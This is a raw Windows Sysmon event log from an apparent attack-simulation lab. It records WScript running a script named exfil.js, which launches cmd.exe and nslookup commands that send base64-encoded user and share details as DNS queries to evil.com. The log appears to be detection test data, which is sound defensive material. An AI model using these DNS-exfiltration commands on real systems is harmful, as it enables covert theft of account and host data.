SYSTEM32\ntdll.dll+51791 154100x8000000000000000203619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.002{2E1864BB-17CB-629A-BB41-000000005F02}6676C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsuxm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x800000000000000043954Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:43.734{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D12237539A7D6287F817E0448E0C14,SHA256=AB9C21C6F33C22500039F29EC0452A55B0636FED82DCE8A19D59D1E0C5C6DC9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.979{2E1864BB-17CC-629A-F241-000000005F02}6086604C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-F141-000000005F02}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.979{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-F241-000000005F02}608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.963{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.963{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.963{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.963{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.963{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-F141-000000005F02}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.963{2E1864BB-17A1-629A-783D-000000005F02}55527256C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-F141-000000005F02}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.971{2E1864BB-17CC-629A-F141-000000005F02}3964C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldoj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.960{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzhspi.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.925{2E1864BB-17CC-629A-EF41-000000005F02}59085700C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-F041-000000005F02}5408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.910{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-F041-000000005F02}5408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.910{2E1864BB-17CC-629A-EE41-000000005F02}77441736C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-F041-000000005F02}5408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.921{2E1864BB-17CC-629A-F041-000000005F02}5408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-EE41-000000005F02}7744C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzhspi.tmp 2>&1 10341000x8000000000000000204110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.878{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-EF41-000000005F02}5908C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.878{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-EF41-000000005F02}5908C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.878{2E1864BB-17CC-629A-EF41-000000005F02}59085700C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-EE41-000000005F02}7744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.863{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-EF41-000000005F02}5908C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.857{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.857{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.841{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.841{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.841{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-EE41-000000005F02}7744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.841{2E1864BB-17A1-629A-783D-000000005F02}55526996C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-EE41-000000005F02}7744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.855{2E1864BB-17CC-629A-EE41-000000005F02}7744C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzhspi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.841{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyvy.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 